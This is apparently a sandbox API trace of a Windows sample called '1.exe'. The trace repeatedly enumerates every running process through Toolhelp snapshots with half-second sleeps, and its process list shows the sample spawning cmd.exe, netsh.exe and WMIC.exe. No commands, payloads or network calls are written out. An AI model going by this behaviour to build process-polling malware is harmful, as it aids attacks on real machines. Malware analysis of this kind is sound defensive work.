lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x8a0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0143.229] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0143.230] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0143.230] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x864, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0143.231] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0143.232] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x8cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0143.232] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0143.233] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0143.233] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0143.234] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf30, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0143.235] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf38, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0143.235] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xf38, pcPriClassBase=8, dwFlags=0x0, szExeFile="netsh.exe")) returned 1 [0143.236] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xf30, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIC.exe")) returned 1 [0143.237] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xf30, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIC.exe")) returned 0 [0143.237] CloseHandle (hObject=0x2fc) returned 1 [0143.237] Sleep (dwMilliseconds=0x1f4) [0144.063] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2d8 [0144.067] Process32FirstW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0144.068] Process32NextW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0144.069] Process32NextW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x13c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0144.069] Process32NextW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0144.070] Process32NextW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0144.071] Process32NextW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0144.071] Process32NextW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0144.072] Process32NextW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0144.072] Process32NextW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0144.073] Process32NextW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0144.074] Process32NextW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0144.074] Process32NextW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.075] Process32NextW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.075] Process32NextW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0144.076] Process32NextW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x40, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.077] Process32NextW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.077] Process32NextW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.078] Process32NextW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.079] Process32NextW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.079] Process32NextW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x498, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.080] Process32NextW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.081] Process32NextW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.081] Process32NextW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.082] Process32NextW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.082] Process32NextW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0144.083] Process32NextW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x690, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.084] Process32NextW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0144.084] Process32NextW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0144.085] Process32NextW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.085] Process32NextW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0144.086] Process32NextW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0144.087] Process32NextW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0144.087] Process32NextW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0144.088] Process32NextW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x8a0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0144.089] Process32NextW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0144.089] Process32NextW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0144.090] Process32NextW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x864, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0144.090] Process32NextW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0144.091] Process32NextW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x8cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0144.092] Process32NextW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0144.093] Process32NextW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0144.093] Process32NextW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0144.094] Process32NextW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf30, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0144.095] Process32NextW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf38, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0144.095] Process32NextW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xf38, pcPriClassBase=8, dwFlags=0x0, szExeFile="netsh.exe")) returned 1 [0144.096] Process32NextW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xf30, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIC.exe")) returned 1 [0144.096] Process32NextW (in: hSnapshot=0x2d8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xf30, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIC.exe")) returned 0 [0144.097] CloseHandle (hObject=0x2d8) returned 1 [0144.097] Sleep (dwMilliseconds=0x1f4) [0144.821] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x304 [0144.826] Process32FirstW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0144.826] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0144.827] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x13c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0144.828] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0144.828] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0144.829] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0144.830] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0144.830] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0144.831] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0144.832] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0144.832] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0144.833] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.833] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.834] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0144.835] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x42, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.836] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.836] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.837] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.838] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 